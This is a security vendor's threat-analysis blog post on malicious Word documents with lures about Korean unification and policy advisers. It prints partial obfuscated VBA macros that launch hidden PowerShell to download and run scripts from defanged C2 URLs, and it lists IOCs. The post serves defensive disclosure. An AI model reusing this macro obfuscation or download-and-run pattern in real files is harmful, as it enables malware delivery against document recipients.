As shown below, the ASEC analysis team introduced on two occasions that malicious word documents with titles ‘Compensation Claim Form’ and ‘Summer Academic Conference Profile Template’ were being distributed. While monitoring similar attack types, the team found evidence that the creator of the documents distributed new word documents in June and on July 1st.
Titles of newly discovered malicious word document
- The National Unification Advisory Council-Korea Association for Political and Diplomatic History Joint Academic Conference Program (Finalized).docx – Additional discovery in June
- [Office of the Inter-Korean Dialogue Policy Advisory Member] Profile Template.docx – Additional discovery on July 1st
Blog posts about malicious words introduced as the same type
- Attacker Distributing Malicious Word Document Written as Compensation Claim Form (June 29th, ASEC blog)
– https://asec.ahnlab.com/en/24443/ - Word Malware Disguised as Summer Academic Conference Profile Template File Being Distributed (June 30th, ASEC blog)
– https://asec.ahnlab.com/ko/24649/ - Malware Disguised as Normal Excel and Word Documents (June 14th, ASEC blog)
– https://asec.ahnlab.com/en/23818/
The name of the distributed file confirmed on July 1st is ‘[Office of the Inter-Korean Dialogue Policy Advisory Member] Profile Template.docx,’ which downloads a word document file including the external dotm macro through the external link in the document.
Figure 1. External URL within ‘[Office of the Inter-Korean Dialogue Policy Advisory Member] Profile Template.docx’In the InterKoreanSummit.dotm file that has the macro code performing the actual malicious behaviors, the following obfuscated code exists. The macro is similar to the one introduced in the ASEC blog posted on June 14th, Malware Disguised as Normal Excel and Word Documents.
Attribute VB_Name = “ThisDocument”
Attribute VB_Base = “0{00020906-0000-0000-C000-000000000046}”
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
eifhhdfasfiedf
aksjdkjaskf
End Sub
Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject(“Shell.Application”)
dfgdfjiejfjdshaj = “tlsiapowtlsiaertlsiastlsiahetlsialltlsia.etlsiatlsiaxtlsiae”
fjdjkasf = “tlsiajdsladkf”
fjdjkasf = Left(fjdjkasf, 5)
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, fjdjkasf, “”)
hdfksallasjkdlaf = “$atlsiatlsiatlsia=’tlsiaC:tlsiatlsia\wtlsiatlsiaintlsiatlsiadotlsiatlsiawstlsiatlsia\ttlsiaetlsiamptlsia\DtlsiatlsiaMItlsia5tlsiaCtlsiaA0tlsia6.tlsiatlsiatmtlsiaptlsia’tlsiatlsia;tlsia”
hdfksallasjkdlaf = Replace(hdfksallasjkdlaf, fjdjkasf, “”)
… (omitted)
aksfkjaskjfksnkf = “tlsiatlsia$tlsiactlsiatlsia;$tlsiadtlsia=[tlsiatlsiaIOtlsia.tlsiatlsiaFitlsiale]tlsiatlsia:tlsia:RtlsiatlsiaeatlsiadAtlsialtlsiatlsialTtlsiaetlsiaxttlsiatlsia($tlsiaatlsiatlsia)tlsia;tlsia$tlsiae=tlsiaietlsiatlsiax $tlsiad;tlsiaitlsiaetlsiax tlsia$tlsiae”
aksfkjaskjfksnkf = Replace(aksfkjaskjfksnkf, fjdjkasf, “”)
skdjfksjkfjkdsfj = hdfksallasjkdlaf + ndkflajdkfjskdjfl + salfnxkfdlsjafkj + sjdfkjaslalsfial + aksfkjaskjfksnkf
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, skdjfksjkfjkdsfj, “”, “open”, 0
End Function
Function aksjdkjaskf()
Dim SngSec As Single
… (omitted)
sakjfkalsjfkasjf = Replace(sakjfkalsjfkasjf, fjdjkasf, “”)
djfkasjfskaal = Left(sakjfkalsjfkasjf, 32)
djfkasjfskaal = Right(djfkasjfskaal, 28)
If djfkasjfskaal = “” Then
Else
Kill djfkasjfskaal
End If
End Function
Code 1. Part of macro code within InterKoreanSummit.dotm file
Attribute VB_Name = “NewMacros”
Sub djfksdalfjkasj()
Selection.TypeText Text:=”a”
End Sub
Sub ejdksaljfkalkf()
Selection.TypeText Text:=”b”
End Sub
Sub eijdklsafkasdk()
Selection.TypeText Text:=”c”
End Sub
Sub uehfsahdkajkas()
Selection.TypeText Text:=”d”
End Sub
… (omitted)
Sub euehfhafjhdjkafqka()
Selection.TypeText Text:=”” Application.Run MacroName:=”Project.NewMacros.euirieafkjekjf” Application.Run MacroName:=”Project.NewMacros.qjiejwfksjalksainuse” Application.Run MacroName:=”Project.NewMacros.euirieafkjekjf” Selection.TypeText Text:=”“
End Sub
Sub eijfkdjqjdfklafea()
Selection.TypeText Text:=”+”
End Sub
Sub efuehjsahfklkejklafe()
Selection.TypeText Text:=”{“
End Sub
… (omitted)
Sub qeuejsahfdasight()
Selection.MoveRight Unit:=wdCharacter, Count:=1
End Sub
Sub idifdsakjflakdsagedown()
Selection.MoveDown Unit:=wdScreen, Count:=1
End Sub
Code 2. Part of macro code within InterKoreanSummit.dotm file
When the macro is run, it connects to C2 (hxxp://ripzi.getenjoyment.net/le/eh.txt) to download an additional script and kills the C:\windows\temp\DMI5CA06.tmp file. The downloaded script has the same code as the one introduced in the post uploaded in June titled “Malware Disguised as Normal Excel and Word Documents,” with the only difference being the C2 URL.
Figure 2. Malicious script found in C2Also, in June, it was found that the malicious file of the same format was distributed with the title ‘The National Unification Advisory Council-Korea Association for Political and Diplomatic History Joint Academic Conference Program (Finalized).docx.’ The external URL existing in the file is as follows.
Figure 3. External URL within ‘The National Unification Advisory Council-Korea Association for Political and Diplomatic History Joint Academic Conference Program (Finalized).docx’Within the Seminarfinal.dotm file downloaded from the URL, there exists a macro that is similar to the one found in the InterKoreanSummit.dotm file explained above. The following is a part of the obfuscated macro code in Seminarfinal.dotm.
Private Sub Document_Open()
eifhhdfasfiedf
End Sub
Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject(“Shell.Application”)
Dim dfgdfjiejfjdshaj As String
Dim yhjhfjdhfdhfuesk(10) As String
dfgdfjiejfjdshaj = “tuwhnptuwhnotuwhnwtuwhnetuwhnrtuwhnstuwhnhtuwhnetuwhnltuwhnltuwhn.tuwhnetuwhnxtuwhnetuwhn”
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, “tuwhn”, “”)
yhjhfjdhfdhfuesk(0) = “tuwhn[tuwhnstuwhnttuwhnrtuwhnituwhnntuwhngtuwhn]tuwhn$tuwhnatuwhn=tuwhn{tuwhn(tuwhnNtuwhnetuwhnwtuwhn-tuwhnOtuwhnbtuwhnjtuwhnetuwhnctuwhnttuwhn “
dfjdiafjlij = Replace(yhjhfjdhfdhfuesk(0), “tuwhn”, “”)
… (omitted)
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(4), “tuwhn”, “”)
yhjhfjdhfdhfuesk(5) = “etuwhnxtuwhn tuwhn$tuwhnbtuwhn;tuwhnituwhnetuwhnxtuwhn tuwhn$tuwhnctuwhn”
dfjdiafjlij = dfjdiafjlij & Replace(yhjhfjdhfdhfuesk(5), “tuwhn”, “”)
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfjdiafjlij, “”, “open”, 0
End Function
Code 3. Part of macro code within Seminarfinal.dotm file
The macro also connects to C2 (hxxp://likel.atwebpages.com/bu/ma.txt) to download an additional script. The script is the same as the one existing in hxxp://ripzi.getenjoyment.net/le/eh.txt explained earlier.
All of the collected files had ‘Naeil_EnglishStart‘ as the user name. As the name is identical to the author of the documents titled ‘[** Summer Academic Conference]_Profile Template.doc‘ and ‘Compensation Claim Form’, it is likely that the collected files were created by the same attacker.
Figure 4. Document property of ‘[** Summer Academic Conference]_Solar Calendar.doc’As you can see, malware targeting particular users are being actively distributed recently. As most of them are assumed to be created by the same attacker, users need to take caution. Users must refrain from opening files and links attached to emails sent from unknown senders, as well as running macros.
AhnLab’s anti-malware product, V3, detects the targeted attack malicious word documents as shown below.
[File Detection]
- Downloader/XML.External
- Downloader/DOC.Generic
[IOC]
- hxxp://chels.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
- hxxp://likel.atwebpages.com/officeDocument/2006/relationships/attachedTemplate/Seminarfinal.dotm
- hxxp://ripzi.getenjoyment.net/le/eh.txt
- hxxp://likel.atwebpages.com/bu/ma.txt
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
The post Malicious Word Documents Pretending ‘Korea Association for Political and Diplomatic History’ and ‘Policy Advisory Member Profile’ Being Distributed appeared first on ASEC BLOG.